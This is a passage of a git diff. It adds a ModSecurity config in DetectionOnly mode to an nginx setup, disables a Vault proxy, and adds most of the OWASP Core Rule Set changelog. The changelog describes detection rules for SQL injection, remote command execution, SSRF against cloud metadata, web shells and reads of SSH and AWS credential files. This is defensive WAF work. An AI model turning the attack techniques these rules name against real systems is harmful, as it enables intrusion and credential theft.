diff --git a/nginx/config/modsecurity.conf b/nginx/config/modsecurity.conf new file mode 100644 index 00000000..6bf76131 --- /dev/null +++ b/nginx/config/modsecurity.conf @@ -0,0 +1,16 @@ +# /etc/nginx/modsecurity/modsecurity.conf +Include /etc/nginx/modsecurity/owasp-crs/crs-setup.conf +Include /etc/nginx/modsecurity/owasp-crs/rules/*.conf + +SecRuleEngine DetectionOnly +SecRequestBodyAccess On +SecResponseBodyAccess On +SecResponseBodyMimeType text/plain text/html text/xml +SecDataDir /var/cache/modsecurity +SecTmpDir /tmp +SecAuditLogType Serial +SecAuditLog /var/log/nginx/modsec_audit.log +SecDebugLog /var/log/nginx/modsec_debug.log +SecDebugLogLevel 9 +SecDefaultAction "phase:1,log,auditlog,pass" +SecDefaultAction "phase:2,log,auditlog,pass" diff --git a/nginx/config/nginx.conf b/nginx/config/nginx.conf index a98b0b57..938eade5 100644 --- a/nginx/config/nginx.conf +++ b/nginx/config/nginx.conf @@ -13,8 +13,8 @@ http { default_type application/octet-stream; # Modsecurity 설정 추가 - modsecurity on; - modsecurity_rules_file /etc/nginx/modsecurity/modsecurity.conf; + # modsecurity on; + # modsecurity_rules_file /etc/nginx/modsecurity/modsecurity.conf; log_format main '$remote_addr - $remote_user [$time_local] "$request" ' @@ -65,19 +65,19 @@ http { } } - server { - listen 8200; + # server { + # listen 8200; - location / { - proxy_pass http://hashicorp_vault:8200; - proxy_http_version 1.1; - proxy_set_header Host $host; - proxy_set_header X-Real-IP $remote_addr; - proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; - proxy_set_header X-Forwarded-Host $server_name; - proxy_set_header X-Forwarded-Proto https; - } - } + # # location / { + # proxy_pass http://hashicorp_vault:8200; + # proxy_http_version 1.1; + # proxy_set_header Host $host; + # proxy_set_header X-Real-IP $remote_addr; + # proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; + # proxy_set_header X-Forwarded-Host $server_name; + # proxy_set_header X-Forwarded-Proto https; + # } + # } # HTTPS 서버 설정 server { @@ -87,8 +87,8 @@ http { ssl_certificate_key /etc/nginx/certs/server.key; ssl_protocols TLSv1.1 TLSv1.2; - # modsecurity on; - # modsecurity_rules_file /etc/nginx/modsecurity/modsecurity.conf; + modsecurity on; + modsecurity_rules_file /etc/nginx/modsecurity/modsecurity.conf; location / { proxy_pass http://django_node_app:8000; # Django 앱을 HTTPS로 리디렉션 @@ -99,9 +99,9 @@ http { proxy_cache_bypass $http_upgrade; } - location /vault { - proxy_pass http://hashicorp_vault:8200; # vault 앱을 HTTPS로 리디렉션 - proxy_set_header Host $host; - } + # location /vault { + # proxy_pass http://hashicorp_vault:8200; # vault 앱을 HTTPS로 리디렉션 + # proxy_set_header Host $host; + # } } } \ No newline at end of file diff --git a/nginx/config/owasp-crs/CHANGES.md b/nginx/config/owasp-crs/CHANGES.md new file mode 100644 index 00000000..9ad99c47 --- /dev/null +++ b/nginx/config/owasp-crs/CHANGES.md @@ -0,0 +1,1901 @@ +# OWASP ModSecurity Core Rule Set (CRS) CHANGES + +## Report Bugs/Issues to GitHub Issues Tracker or the mailinglist +* https://github.com/coreruleset/coreruleset/issues + or the CRS Google Group at +* https://groups.google.com/a/owasp.org/g/modsecurity-core-rule-set-project + +## Nightly builds +New changelog entries are written to `.changes-pending.md`. They will be moved to the main changelog before a release. + +## Version 4.0.0 - 2022-06-?? + +Important changes: + * feat: introduce plugin architecture for extending CRS and minimizing attack surface. (Christian Folini, Max Leske, Jozef Sudolský, Andrew Howe) [#2038, #2448, #2404] + * feat: early blocking option (Christian Folini) [#1955] + * feat: support for HTTP/3 (Jozef Sudolský) [#3218] + * feat: application exclusions and less-used functionality have been migrated to plugins. (Christian Folini, Max Leske, Jozef Sudolský, Andrew Howe) + * feat: granular control over reporting levels in 9801xx rules (Simon Studer, Andrew Howe, Christian Folini) [#2482, #2488] + * feat: all formerly PCRE-only regular expressions are now compatible with Re2/Hyperscan WAF engines (Max Leske, Felipe Zipitría, Allan Boll, Franziska Bühler) [#1868, #2356, #2425, #2426, #2371, #2372] + * feat: new rule 920620 PL1 to explicitly detect multiple Content-Type abuse (CVE-2023-38199) (Andrea Menin) [#3237] + * feat: nightly packages published regularly (Felipe Zipitría) [#2207] + * feat: add enable_default_collections flag to not initialize collections by default (Matteo Pace) [#3141] + * feat: extend definition of restricted headers to include `Content-Encoding` and `Accept-Charset` by default (920450 PL1, 920451 PL2) (Walter Hop) [#2780, #2782] + * feat: switch to using wordnet instead of spell for finding English words in spell.sh (Max Leske) [#3242] + * fix: refactor and rename anomaly scoring variables and paranoia level definition (Simon Studer) [#2417] + * update: drop HTTP/0.9 support to resolve FP (Federico G. Schwindt) [#1966] + +Tool changes: + * feat: extend spell.sh script with an opt-in manual list of common and partial words. (Matteo Pace) [#3273] + * feat: rework spell.sh utility to help with detection of false positives English words (Andrea Menin) [#3029] + * feat: improve usability of spell.sh utility (Max Leske) [#3238] + * feat: extend rules-check.py script to better enforce rule format in project guidelines (Ervin Hegedus) [#3113] + * feat: extend rules-check.py script to ensure that `auditLogParts` is only used in last chained rule (Ervin Hegedus) [#2609] + * feat: extend rules-check.py script to ensure that rules use `@rx` operator explicitly (Ervin Hegedus) [#2541] + * feat: extend rules-check.py script to strip comments when parsing crs-setup.conf.example (Ervin Hegedus) [#3161] + +Changes after RC1: + * feat: add consistent rule references to initialization rule comments (Andrew Howe) [#2813] + * feat: add placeholder files for new plugin architecture (Walter Hop) [#2515] + * feat: check initialization and use for all TX variables (Ervin Hegedus) [#3043] + * feat: disassemble complex regexes for 932xxx rules that were subsequently replaced by other rules (Max Leske) [#2566] + * feat: extend rules to detect keyword `time` as prefix of *nix and Windows RCE rules (rules later replaced) (Franziska Bühler) [#2819] + * feat: extend rules to detect path based XSS via new target REQUEST_FILENAME in 941xxx rules (Walter Hop) [#2894] + * feat: extend rule to detect restricted `method override` headers (Mark Zeman / KramNamez) [#3056] + * feat: improve rule file 951xxx via the use of `skipAfter` instead of variable `TX:sql_error_match` (Jozef Sudolský) [#2754] + * feat: move regexp-assemble data files to root directory (Felipe Zipitría) [#3002] + * fix: reformat several initialization rules to follow project guidelines (Ervin Hegedus) [#3157] + * fix: remove auditLogParts actions from all rules where present (Andrea Menin, Ervin Hegedüs) [#3034, #3081] + * fix: remove uncommon Content Types from default in `crs-setup.conf.example` (Andrea Menin) [#2768] + * fix: update diverse rules to follow new naming convention with paranoia level TX variables (Christoph Hansen) [#2937] + * fix: remove initialization rules for redundant IP reputation variables (901150, 901152) (Andrew Howe) [#2833] + * fix: initialize all variables used properly (901169) (Ervin Hegedus) [#2802] + * fix: remove rule to detect security scanner http headers (913110 PL1) (Christian Folini) [#3241] + * feat: remove ineffective anti-scanner list scanners-urls.data and associated rule (913120 PL1) (Christian Folini) [#3235] + * feat: rework restricted headers mechanism into two separate lists (920450 PL1, 920451 PL2) (Andrew Howe) [#3152] + * feat: new rule detect multiple occurences of charset keyword in content type header (920530 PL1) (Jan Gora / terjanq) [#2571] + * feat: new rule to detect unicode character bypass check for non JSON requests (920540 PL1) (Franziska Bühler, 0SPwn) [#2512] + * feat: new rule to detect # char in URIs (920610 PL1) (Karel Knibbe) [#2919] + * fix: use correct anomaly scoring variables and panaoia level tags across several rules (921170 PL1, 921220 PL4, 932220 PL2, 932331 PL3, 933211 PL3, 934101 PL1, 942362 PL2, 951100) (Christoph Hansen) [#2931] + * feat: new rules to detect HTTP parameter pollution bypasses (921210 PL3, 921220 PL4) (Christian Folini) [#2747] + * fix: use correct anomaly scoring variables and paranoia level tags across several rules (921220 PL4, 932101 PL2, 932331 PL3, 933211 PL3, 942362 PL2) (Ervin Hegedus) [#2832] + * feat: new rule to detect range header that is now forbidden on PL3 and up (921230 PL3) (Christian Folini) [#2760] + * feat: new rule to detect mod_proxy attack (CVE-2021-40438) (921240 PL1) (Franziska Bühler) [#2818] + * feat: new rules to detecting ModSecurity body processor confusion using the `Content-Type` HTTP header (921421 PL1, 921422 PL2) (Simon Studer, Ervin Hegedus) [#2763] + * fix: handle false positives when detecting ModSecurity body processor confusion (921422 PL2) (Ervin Hegedus) [#2784] + * fix: remove possessive quantifiers (922110 PL1) (Felipe Zipitría) [#2989] + * feat: extended rule to detect Tomcat specific path traversal attack (930110 PL1) (Christoph Hansen) [#2915] + * feat: extend rule to detect access attempts to /tmp/ (930120 PL1, 930121 PL2) (Max Leske) [#3131] + * feat: extend rule to detect ECDSA type SSH identity files via list of sensitive *nix files (930120 PL1) (Pinaki Mondal / 0xInfection) [#2586] + * feat: extend rule to detect additional sensitive files on *nix systems (930121 PL2, 930130 PL1) (Gwendal Le Coguic / gwen001) [#2560] + * feat: new rules to detect lfi and sqli in user-agent and referer request headers (930121 PL2, 942152 PL2, 942321 PL2) (Franziska Bühler, Max Leske, Shivam Bathla) [#3102] + * fix: extend rule to detect more LFI (930121 PL2) (Felipe Zipitría) [#2791] + * feat: extend data file to include additional restricted file names (restricted-files.data, 930130 PL1) (Jitendra Patro) [#3219] + * feat: extend data file to include PrestaShop configuration file (restricted-files.data, 930130 PL1) (Jean-François Viguier) [#3192] + * feat: extend rule to detect `npm-shrinkwrap.json` to restricted-files (930130 PL1) (Esa Jokinen / oh2fih) [#2627] + * feat: extend rules to detect additional protocols in RFI attacks (931130 PL2, 934120 PL2) (Karel Knibbe) [#2572] + * feat: extend rule to detect `url:file:` schema in Java RFI attacks (931130 PL2) (Andrew Howe) [#2727] + * feat: new rule to detect path traversal attacks using URL encoded URL schemes in Java applications (931131 PL2) (Christoph Hansen) [#2902] + * feat: extend rule to detect additional *nix shell commands (931160 PL1) (Gwendal Le Coguic / gwen001) [#2563] + * feat: extend rule to detect additional entries to *nix command lists (932100 PL1, 932105 PL1) (Finn Westendorf / wfinn) [#2552] + * feat: extend rule to detect additional *nix commands (932100 PL1) (Felipe Zipitría) [#2676] + * feat: extend rule to detect additional *nix commands (932105 PL1) (Felipe Zipitría) [#2677] + * feat: extend rule to detect `mshta` in Windows shell commands (932110 PL1) (Somdev Sangwan / s0md3v) [#2588] + * feat: extend rule to detect additional powershell cmdlet on Windows (932120 PL1) (Pinaki Mondal / 0xInfection) [#2589] + * feat: extend rule to detect Powershell RCEs better via new automation (932120 PL1) (Felipe Zipitría) [#2669] + * feat: new rule to detect Windows cmdlet aliases (932125 PL1) (Pinaki Mondal / 0xInfection) [#2589] + * fix: extend rule to detect character class *nix expressions (932130 PL1) (Somdev Sangwan / s0md3v, Walter Hop) [#2594] + * feat: extend rule to detect `busybox`, `$SHELL`, and `${SHELL}` in *nix RCE attacks (932150 PL1) (Walter Hop) [#2728] + * feat: extend rule to detect c99 and printf utilities (932150 PL1) (Karel Knibbe) [#2569] + * feat: extend rule to detect `ksh` in *unix RCE attacks (932150 PL1) (Andrew Howe) [#2721] + * feat: extend rule to detect RCE attacks using compression utilities (932150 PL1) (Andrew Howe) [#2712] + * feat: extend rule to detect RCEs using base64 evasions (932150 PL1) (Somdev Sangwan / s0md3v, Andrew Howe) [#2590] + * feat: extend rule to detect RCEs using evasions quotes with `python...` commands (932150 PL1) (Somdev Sangwan / s0md3v, Andrew Howe) [#2590] + * feat: new rule to detect generalised *nix RCE (932150 PL2) (Karel Knibbe) [#2583] + * feat: extend rule to detect RCE better via automation (932160 PL1) (Felipe Zipitría) [#2662] + * fix: remove unnecessary prefixes from paths in `unix-shell.data` (932160 PL1) (Felipe Zipitría) [#2662] + * feat: extend rule to detect `expre` in unix-shell list (932161 PL2) (Felipe Zipitría) [#2667] + * feat: new rules to detect *nix commands in user-agent and referer request headers (932161 PL2, 932237 PL3) (Franziska Bühler, Max Leske, Shivam Bathla) [#3132] + * feat: use new automation to generate `restricted-uploads.data` from `restricted-files.data` (932180 PL1) (Max Leske) [#3282] + * feat: extend rule to detect RCE in user-agent request header (932200 PL2) (Franziska Bühler, Shivam Bathla) [#3108] + * fix: new rules to handle referer header and fix false positive (932205 PL2, 932206 PL2) (Max Leske) [#3300] + * feat: extend rule to detect quote evasion (932210 PL2) (Max Leske) [#3120] + * feat: extend rule to detect `sh` (932210 PL2) (Franziska Bühler) [#2816] + * feat: extend rule to detect SQLi via automation of keyword list updates (932210 PL2) (Felipe Zipitría) [#2801] + * fix: add word boundaries for sh in RCE rules (932230 PL1, 932250 PL1) (Max Leske) [#3186] + * fix: handle false positive against `sh` in *nix command injection attacks (932230 PL1, 932250 PL1, 932236 PL2) (Max Leske) [#3186] + * feat: move *nix command injection rule 932101, 932106 into the same range as the other *nix command injection rules (932231 PL2, 932232 PL3) (Felipe Zipitría, Max leske) [#3092] + * feat: replace *-with-params.ra files with suffix replacements (932235 PL1, 932236 PL2, 932239 PL2, 932237 PL3) (Max Leske) [#3331] + * fix: add whitespace after keywords `mail` and `task` to solve false positives (932236 PL2) (Franziska Bühler) [#3274] + * fix: align unix-shell-upto3* files (932236 PL2) (Max Leske) [#3128] + * fix: solved false positives with creation of word boundaries for commonly used words used in *nix RCE rules (932236 PL2) (Max Leske) [#3187] + * fix: use correct anomaly scoring variable (932236 PL2) (Ervin Hegedus) [#3112] + * feat: new rule to detect *nix commands in user-agent and referer request headers (932239 PL2) (Franziska Bühler, Shivam Bathla) [#3104, #3318] + * fix: remove ARGS_NAME from target variables in (932240 PL2) (Andrea Menin) [#2960] + * fix: use correct anomaly scoring variables and panaoia level tags across for rule (932240 PL2) (Ervin Hegedus) [#2963] + * feat: replace *nix command injection rules 932150 PL1, 932151 PL1 with new rules for commands of less than 4 characters and commands of more than 4 characters in length respetively (932250 PL1, 932260 PL1) (Felipe Zipitría, Max leske) [#3092] + * fix: false positives by requiring specific tokens to follow commands (932250 PL1) (Max Leske) [#3186] + * feat: new rules to detect detecting *nix shell history invocations (932330 PL1, 932331 PL3) (Karel Knibbe) [#2577] + * feat: new Windows commands rules based on lolbas-project replacing 932110, 932115 (932370 PL1, 932380 PL1) (Felipe Zipitría, Franziska Bühler, Max Leske) [#3059, 3170] + * feat: extend rule to detect additional file extensions via list of executable PHP files (933110) (Jan Gora / terjanq) [#2585] + * feat: extend data file to add missing PHP config directives (php-config-directives.data, 933120 PL1) (Max Leske) [#3028] + * feat: extend rule to detect additional sensitive PHP directives (933120 PL1) (Gwendal Le Coguic / gwen001) [#2561] + * feat: extend rule to detect PHP config directives via automation of keyword list updates (933120 PL1) (Felipe Zipitría) [#2696] + * feat: extend rule to detect sensitive PHP variables better (933130 PL1) (Felipe Zipitría) [#2668] + * feat: extend data file to include additional php function names (php-function-names-933151.data, 933151 PL2) (Jitendra Patro) [#3212] + * feat: automate generation of PHP function dictionaries, revisited detection (933160 PL1, 933161 PL3, 933150 PL1, 933151 PL2) (Juan-Pablo Tosso, Christian Folini, Matteo Pace) [#3273] + * feat: extend rule to detect `document.domain` XSS (933160 PL1, 941180 PL1) (Franziska Bühler, 0SPwn) [#2567] + * feat: extend rule to detect evasions in PHP contexts with `"` (933160 PL1) (Somdev Sangwan / s0md3v) [#2596] + * feat: rearrange keywords (933160 PL1, 941390 PL1) (Karel Knibbe) [#2905] + * fix: solve ReDoS issue in rule (933161 PL3) (Andrea Menin) [#2302] + * feat: extend rule to detect `bzip2` wrapper in PHP injection attacks (933200 PL1) (Andrew Howe) [#2723] + * feat: extend rule to detect `ssh2.*` wrappers in PHP injection attacks (933200 PL1) (Andrew Howe) [#2731] + * feat: new rule to detct PHP injection attacks without terminating semi-colon (933211 PL3) (Karel Knibbe) [#2581] + * feat: extended rule to detect Node.js injection attacks using `require` and `child_process` (934100 PL1, 932101 PL2) (Andrea Menin) [#2893] + * feat: extend rule to detect Node.js RCE better (934100 PL1) (rektor0) [#2578] + * feat: improve transformation pipeline to detect Base64-encoded evasions (934100 PL1) (Andrew Howe) [#3203] + * feat: new rule to detect Node.js RCE detection (934101 PL2) (rektor0) [#2578] + * fix: improve js rule transformation pipelines (934101 PL1, 934130 PL1, 934169 PL1, 934131 PL2) (Andrew Howe) [#3312] + * feat: extend data file to include additional indicators (ssrf.data, 934110 PL1) (Jitendra Patro) [#3213] + * feat: extend rule to detect SSRF better (934110 PL1) (Felipe Zipitría) [#2660] + * feat: extend rule to detect additional schema and IP evasion techniques in SSRF (934120 PL2) (Felipe Zipitría, Max Leske) [#2599] + * feat: extend rule to detect octal address of AWS metadata endpoints (934120 PL2) (Karel Knibbe) [#2555] + * feat: extend rule to detect SSRF better by inspecting targets beyond just ARGS (934120 PL2) (Karel Knibbe) [#2555] + * feat: new rules to detect detection of Perl and Ruby RCE signatures in a generic way (934140 PL2, 934150 PL1) (Karel Knibbe) [#2587] + * feat: new rule to detect Node DoS attack via expressions resolving to true (934160 PL1) (Karel Knibbe) [#2917] + * fix: remove unnecessary character escape (941120 PL2) (Andrew Howe) [#2805] + * feat: disassemble complex regex fully (941160 PL1) (Felipe Zipitría) [#2701] + * feat: disassemble complex regex (941210 PL1) (Felipe Zipitría) [#3262] + * feat: extend rule to detect XSS evasions using carriage return (\r) and new line (\n) characters (941210 PL1) (oct0pus7) [#2576] + * feat: disassemble complex regex (941220 PL1) (Felipe Zipitría) [#3263] + * feat: new rule to detect JavaScript methods (941390 PL1) (Franziska Bühler) [#2702] + * feat: extend rule and moved rule from PL3 to PL2 (942101 PL2) (Matteo Pace) [#2922] + * feat: extended rule to detect common SQL injection probing in path segments (942110 PL2) (Andrea Menin) [#2914] + * feat: add target REQUEST_FILENAME to rule to detect path-based SQLi attacks (942120 PL2) (Andrew Howe) [#3057] + * feat: extend rule to detect use of `collate` in SQLite injection attacks (942120 PL2) (Jan Gora / terjanq) [#2584] + * fix: extend rule to detect more SQLi (942120 PL2) (Karel Knibbe) [#2556] + * feat: extend rule to detect `glob` in list of SQLi tautologies (942130 PL2) (Franziska Bühler) [#2729] + * fix: remove unneeded TX variables (942130 PL2, 942131 PL2, 942521 PL3) (Andrea Menin) [#3293] + * feat: extend rule to detect more SQL function names (942150 PL2) (Karel Knibbe) [#2895] + * feat: extend rules to detect more SQL error messages and functions (942151 PL1, 942152 PL1, 951220 PL1, 951230 PL1, 951240 PL1) (Jitendra Patros) [#3336] + * feat: extend rule to detect additional SQL function signatures (942151 PL1) (Karel Knibbe) [#2570] + * feat: extend rule to detect `endswith`, `startswith`, `unistr`, `pg_client_encoding` and various json sql functions (942151 PL1) (Franziska Bühler) [#2874] + * feat: extend rule to detect various json functions (942151 PL1) (Franziska Bühler) [#3041] + * feat: extend rule to detect `sql_compileoption_get` in SQLite injection attacks (942152 PL1) (Andrew Howe) [#2718] + * feat: new regex-assembly file for rule (942170 PL1) (Andrea Menin) [#2939] + * feat: extend rule to detect SQL injection authentication bypasses (942180 PL2) (rekter0) [#2575] + * feat: disassemble complex regex (942200 PL2) (Franziska Bühler, Max Leske) [#2932] + * feat: extend rule to detect SQLi in user-agent and referer request headers (942200 PL2, 942370 PL2) (Franziska Bühler, Shivam Bathla) [#3106] + * feat: improve regex-assembly file for rule (942210 PL2) (Andrew Howe) [#2945] + * feat: disassemble complex regex (942240 PL1) (Franziska Bühler, Max Leske) [#2938] + * feat: new regex-assembly file for rule (942280 PL1) (Andrea Menin) [#2933] + * feat: extend rule to detect additional MongoDB operators via NoSQL commands list (942290 PL1) (rekter0) [#2579] + * feat: new regex-assembly file for rule (942290 PL1) (Andrea Menin) [#2942] + * feat: improve regex-assembly format (942300 PL2) (Felipe Zipitría) [#3296] + * feat: extend rule to detect `::int` and `::bool` sql data conversions (942320 PL1) (Franziska Bühler) [#2872] + * feat: extend rule to detect `lo_get` and `::text` via PostgreSQL functions list (942320 PL2) (Franziska Bühler, Walter Hop, Shivam Bathla) [#2925] + * feat: extend rule to detect `lo_import` and `div` via PostgreSQL functions list (942320 PL2) (Franziska Bühler, Shivam Bathla) [#2916] + * feat: extend rule to detect more PostgreSQL data types (942320 PL2) (Franziska Bühler, Shivam Bathla) [#3019] + * fix: add word boundaries to keywords to solve false positives (942330 PL2) (Franziska Bühler) [#3207] + * feat: extend rule to detect SQL injection better (942340 PL2) (Karel Knibbe) [#2557] + * fix: extend rule to detect more SQLi (942340 PL2) (Jan Gora / terjanq) [#2559] + * feat: new regex-assembly file for rule (942370 PL2) (Christoph Hansen, Max Leske) [#2954] + * feat: disassemble complex chained regex (942440 PL2) (Felipe Zipitría) [#3295] + * fix: reformat rules to follow project guidelines (942440 PL2, 949959, 949159, 959059, 959159) (Ervin Hegedus) [#3206] + * fix: solve errors in regex pattern (942440 PL2) (Andrea Menin) [#3290] + * feat: extend rules to detect `current_user` and `overlay` (942470 PL1, 942480 PL2) (Franziska Bühler) [#2875] + * feat: extended rule to detect detect SQL injection attacks using headers (942480 PL2) (Paul Beckett) [#2911] + * feat: extend rule to detect newlines in overlay (942480 PL2) (Franziska Bühler, Shivam Bathla) [#3040] + * feat: new rules to detect SQL authentication bypasses (942520 PL2, 942521 PL2, 942522 PL2) (Jan Gora / terjanq) [#2603] + * feat: extend rule to detect SQLi in user-agent and referer request headers (942521 PL2) (Franziska Bühler, Shivam Bathla) [#3107] + * feat: new rule to detect `';` in sqli (942530 PL3) (Franziska Bühler) [#2808] + * fix: update scoring variable (942540 PL2) (Walter Hop) [#2970] + * feat: new rule to detect MySQL scientific notation attacks (942560 PL1) (Jitendra Patro) [#3316] + * feat: extend rule to detect JAVA exploits better via java-classes.data file (944130 PL1) (Dennis Brown) [#3048] + * fix: update administrative rule ids for consistent operation (950011, 950012, 950018) (Ervin Hegedüs) [#3339] + * feat: extend data file to include additional sql error messages (sql-errors.data, 951100 PL1) (Jitendra Patro) [#3214] + * fix: handle false positive in SQL error leakage detection (951240 PL1) (Jozef Sudolský) [#3169] + * feat: extend rule to detect PHP errors better via new automation (953100 PL1) (Felipe Zipitría) [#2663] + * feat: new rules to detect PHP error leakages with high false positive rates at paranoia level 2 instead of 1 (953100 PL1, 953101 PL2) (Andrea Menin) [#3119] + * fix: ignore case of `PHP` tag in response text (953210 PL1) (Felipe Zipitría) [#2664] + * feat: extend rule to detect IIS errors via automation of pattern updates (954120 PL1) (Felipe Zipitría) [#2810] + * feat: extend data file to include additional web shells (web-shells-php.data, 955100 PL1) (Jitendra Patro) [#3215] + * feat: extend data file to include additional web shells (web-shells-php.data, 955100 PL1) (Jozef Sudolský) [#2687] + +Changes before RC1: + * Detect Log4j / Log4Shell (Christian Folini, Max Leske, Andrew Howe) [#2349] + * Detect Spring4Shell (Christian Folini, Andrea Menin) [#2464] + * Detect JavaScript prototype pollution (Walter Hop) [#2411] + * Detect use of common webshells by inspecting response (Jozef Sudolský, Andrea Menin) [#1962, #2039, #2116] + * Add phpMyAdmin exclusion rules (now a plugin) (Jozef Sudolský) [#1951] + * Add phpBB exclusion rules (now a plugin) (Jozef Sudolský) [#1893] + * Deny uploading .jsp and .jspx files (Walter Hop) [#2456] + * Detect path traversal in file upload (k4n5ha0, Franziska Bühler, Felipe Zipitría) [#2451] + * Block access to AWS cli files (Jozef Sudolský) [#2439] + * Detect /proc and /sys access attempts (Andrew Howe) [#2154] + * Detect common IP-based SSRF targets (Felipe Zipitría) [#2259] + * Detect email protocol attacks (Felipe Zipitría) [#2322] + * Detect more error based SQL injections (Jozef Sudolský) [#2429] + * Detect SQLi with 'drop' keyword (Jozef Sudolský) [#2218] + * Detect RCE attempts with uninitialized shell vars (Andrea Menin) [#2151] + * Detect more unix RCE commands (Felipe Zipitría) [#2129] + * Detect SQLi with 'if exists' (NiceYouKnow) [#2121] + * Detect sqlite system command injection (flo405, Andrea Menin, Christian Folini) [#2032] + * Include IPv6 in Host Header check (itsTheFae, Ervin Hegedus, Jozef Sudolský) [#1929] + * Block access to WEB-INF directory (Jozef Sudolský) [#2092] + * Block access to various sensitive files (Jozef Sudolský) [#1960] + * Improve SQLi detection with spaces (Manuel Spartan, Max Leske) [#2436, #2290] + * Improve SQLi detection with 'not between' (NiceYouKnow, Max Leske, Franziska Bühler) [#2115] + * Fix blind SQLi detection in rule 942160 (Franziska Bühler, Christian Folini) [#1956] + * Lower FP by moving '-->' keyword to PL2 (Paul Beckett) [#2060] + * Run libinjection XSS detector on request filename in PL2 (Andrew Howe) [#2208] + * Validate Sec-Fetch-User header (somechris) [#2020] + * Detect Krzana bot (Deepshikha Sinha) [#2432] + * Detect CensysInspect and seoscanners.net crawlers (Andrew Howe) [#2155] + * Detect burpcollaborator scanner (Amir Hosein Aliakbarian) [#2152] + * Detect QQGameHall malware (Walter Hop) [#2144] + * Detect 'httpx' scanner (Will Woodson) [#2045] + * Detect 'ecairn' crawler (Jozef Sudolský) [#2024] + * Detect LeakIX scanner (Jozef Sudolský) [#1961] + * Unified regexp utils to automate error-prone actions and automatically update rules from regexp sources (Max Leske) [#2149, #2223, #2423, #2495, #2489, #2473] + * Add Google OAuth2 exclusion plugin (Jozef Sudolský) [#2388] + * Validate Accept-Encoding headers (Franziska Bühler) [#2357] + * Deny access to sslvpn_websession (Jozef Sudolský) [#2338] + * Detect 'Invoke-WebRequest' command (Paul Beckett) [#2271] + * Update send-payload-pls.sh (Manuel Spartan) [#2288] + * Exclusion profiles and DOS rules have been moved from CRS to plugins (Andrew Howe) [#2469] + * IP reputation rules have been moved from CRS to plugins (Simon Studer) [#2482] + * Tests: add utility script to find rules without tests (Ervin Hegedus) [#2279] + * Add crs-rules-check tool that runs sanity checks against rules (Ervin Hegedus) [#2236] + * Tests: add utility to find longest data lengths (Ervin Hegedus) [#2277] + * Improve rule-ctl script to modify rules (Max Leske) [#2193] + * Add utility to change version numbers (Ervin Hegedus) [#2085] + * feat: new rule 934170 PL1 for PHP supporting `data:` scheme without using `//` before the content-type (Felipe Zipitría) [#3018] + * fix: add local_file scheme from python2 in 931130 and 934120 (Felipe Zipitría) [#2809] + * fix: update sql reserved words in rule 942120 (Felipe Zipitría) [#2798] + * feat: new rule 932175 PL1 detecting `alias` builtin (Felipe Zipitría) [#2796] + * feat: new rules 922100-922120 PL1 detecting attacks on multipart headers (Felipe Zipitría) [#2769] + * feat: improve and extend cmdline processor to find more evasions (Felipe Zipitría) [#2907] + * feat: new rule to detect authentication bypass via SQL injection that abuses semi-colons to end the SQL query in 942540 PL1 (Karel Knibbe) [#2904] + * fix: update various rules to consolidate use of backslashes to \x5c representation for better compatibility with known WAF engines (Andrew Howe, Max Leske) [#2335, #2345, #2375, #2376, #2399, #2400, #2402, #2410, #2420, #2441, #2442, #2454, #2426] + * fix: Adapt rule 942440 to work in all ModSecurity versions (Andrew Howe) [#2201] + * Fix bypass in rule 931130 (Andrea Menin) [#2479] + * Fix bypass in rule 933210 (Andrea Menin) [#2214] + * Fix bypass in rule 942190 (Andrea Menin) [#1910] + * Fix triple dot false negative in rules 930100, 930110 (Franziska Bühler) [#2309, #2310] + * Fix false negative in rule 942230 (Max Leske) [#2348] + * Fix FP in CalDAV Content-Type (Vandan Rohatgi) [#2505] + * Lower FP in MySQL data leakage rule (Jozef Sudolský) [#2490] + * Lower FP in SQL function names by splitting between PL1/PL2 (Jozef Sudolský) [#2480] + * Fix FP in 'having' SQLi (Felipe Zipitría) [#2248] + * Fix FP in JWT tokens (Andrea Menin) [#2460] + * Fix FP on 'time' and 'ping' keywords (Walter Hop) [#2457] + * Fix FP in 'application/*+json' Content-Type (Mirko Dziadzka, Walter Hop) [#2455] + * Fix FP in Sec-CH-UA header (Franziska Bühler) [#2361] + * Fix FP in PostgreSQL error messages (Jozef Sudolský, Franziska Bühler) [#1870, #2313] + * Fix FP in Sybase error message (Jozef Sudolský) [#2307] + * Fix FP in base64 content (Jozef Sudolský) [#2226] + * Fix FP in XMLNLS (Walter Hop) [#2192] + * Fix FP in rule 941310 with Russian characters (Max Leske) [#2107] + * Fix FP in rule 942300 by adding word boundary checks (Franziska Bühler) [#2099] + * Fix FP in SQLi by adding word boundary checks (Jozef Sudolský) [#2078] + * Fix FP in SQLi with keyword 'union' (Franziska Bühler) [#2058] + * Fix FP in rule 942230 with 'case' (Franziska Bühler) [#2035] + * Fix FP for YAM package manager (Jozef Sudolský) [#2022] + * Fix FP for '..' without slashes (Tetrik, Walter Hop) [#2016] + * Fix FP in rule 932115 on 'sort' (Franziska Bühler) [#2012] + * Fix FP in rule 933210 when cookie contains slash (Ervin Hegedus) [#1996] + * Fix FP in rule 932100 (Franziska Bühler) [#1954] + * Fix FP in Google OAuth2 (Jozef Sudolský, Christian Folini) [#1958] + * Nextcloud: fix FPs (kam821, Jozef Sudolský, ntimo, Felipe Zipitría, pyllyukko) [#1840, #1843, #1847, #1946] + * Fix FP on .axd in restricted extensions, these are public (Jozef Sudolský) [#1925] + * Fix FP on 'version' string in Content-Type header (Jozef Sudolský) [#1901] + * Fix FP in rule 941120 by adding character limit (Christian Folini) [#1872] + * Fix FP in Content-Type with '#' character (Jozef Sudolský) [#1856] + * phpMyAdmin: Fix FPs (Jozef Sudolský) [#2172, #2249, #2321, #2351] + * WordPress: fix FPs (Jozef Sudolský) [#1899, #1971, #2320] + * WordPress: fix FPs in Site Health page (Robert de Boer, Fregf, Walter Hop) [#1895, #1920] + * WordPress: fix FPs and improve performance (Walter Hop) [#1997, #2311] + * XenForo: fix FPs (Walter Hop, ThanhPT) [#1844, #1865, #1894, #1998, #2421] + * phpBB: Fix FPs (Jozef Sudolský) [#2057, #2180, #2299, #2343] + * Fix bypass in rule 933210 (Walter Hop) [#2033] + * Improve sampling mode efficiency (Paul Beckett) [#2094] + * Move rules to the lowest phase possible based on their inputs (Ervin Hegedus) [#1941] + * Stop decoding things twice (Federico G. Schwindt) [#1845] + * contributing.md: add more information for new developers (Andrew Howe) [#2487] + * Move 'ecairn' from scanners to crawlers (Felipe Zipitría) [#2408] + * 93231x rules: simplify already-lowercased regexps (Felipe Zipitría) [#2485] + * remove double m,n in regexp (Felipe Zipitría) [#2484] + * update OWASP vulnerability urls (Walter Hop) 